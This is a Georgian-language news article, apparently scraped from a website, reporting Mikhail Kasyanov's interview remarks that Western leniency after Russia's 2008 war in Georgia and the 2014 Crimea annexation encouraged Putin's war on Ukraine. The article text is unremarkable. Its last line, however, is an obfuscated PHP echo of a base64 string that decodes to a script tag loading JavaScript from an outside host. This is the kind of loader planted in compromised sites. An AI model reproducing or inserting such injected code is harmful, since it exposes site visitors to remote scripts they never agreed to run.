celsiusi
ავერსი საქკაბელი
ჩვენ ვხედავთ, რომ დასავლეთმა  გაიღვიძა, – ამბობს რუსეთის ყოფილი პრემიერ–მინისტრი, მიხაილ კასიანოვი  „რადიო მაესტროსთან“ ინტერვიუში.
 
კასიანოვის თქმით, დღეს როდესაც უკრაინაში, უკრაინის წინააღმდეგ ომი მიმდინარეობს, პუტინი და მისი პროპაგანდა აცხადებენ, რომ მსოფლიო: დასავლეთს, ამერიკას, ბოროტებას ებრძვიან, ის ყოველ დღე  ეძებს არგუმენტს უკრაინაში შეჭრის დასასაბუთებლად. 
 
„ჩვენ ვხედავთ, რომ დასავლეთმა  გაიღვიძა, ჩვენ გვახსოვს 2008 წელი, მაშინ ბუქარესტში ნატოს სამიტზე საქართველოს, უკრაინის და მოლდოვის თხოვნაზე, მიენიჭებინათ საგზაო რუკა, უარყოფილი იქნა, რა მოხდა მას შემდეგ? მყისიერად? ჩვენ ეს გვახსოვს და ჩემმა რეგიონალურმა აქტივისტებმა ჩრდილოეთ კავკასიაში და სამხრეთ რუსეთში იციან, როგორ კოლონებით, ეშელონებით მიდიოდნენ საქართველოს საზღვრებთან, როგორ მზადდებოდა ეს პროვოკაცია, შემდეგ კი ეს იყო შეჭრა. ამის შემდეგ რა მოხდა? ხელმოწერილი იქნა ცეცხლის შეწყვეტის და რუსეთის საჯარისო ნაწილების გაყვანის შეთანხმება, მაგრამ სამი თვის განმავლობაში არცერთი პუნქტი არ იყო შესრულებული, მეტიც, აფხაზეთის და სამხრეთ ოსეთის დამოუკიდებლობა იქნა აღიარებული. პრაქტიკულად საქართველოს ტერიტორიების მესამედის ანექსია განხორციელდა. სამი თვის შემდეგ, დასავლეთი დაუბრუნდა პუტინს, თითქოსდა არც არაფერი მომხდარა, ურთიერთობები ჩვეულ ფორმას დაუბრუნდა,. პუტინმა გაიგო, რომ მას ასე მოქცევის უფლება მიეცა, ამის გამო, სწორედ ამ დაუსჯელობის გამო, საქართველოში შეჭრის შემდეგ ყირიმის ანექსია მოახდინა, იმ გათვლით რომ ანალოგიურად მოხდებოდა ყველაფერი. დაახლოებით ასეც მოხდა, დაწესდა მინიმალური სანქციები, ის ახლაც ასე ფიქრობდა, უკრაინის წინააღმდეგ ომში, რომ უკრაინის წინააღმდეგ ფართო მასშტაბიანი ომის გახსნის შემთხვევაშიც კი სანქციები მინიმალური იქნებოდა, როგორც ეს 2014 წელს მოხდა, თუმცა ის შეცდა, ვერ გათვალა, დასავლეთმა გამოიღვიძა.“ – აღნიშნავს რუსი პოლიტიკოსი. 
 
ინტერვიუს სრულად ნახვა შესაძლებელია აქ. 
 
787
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");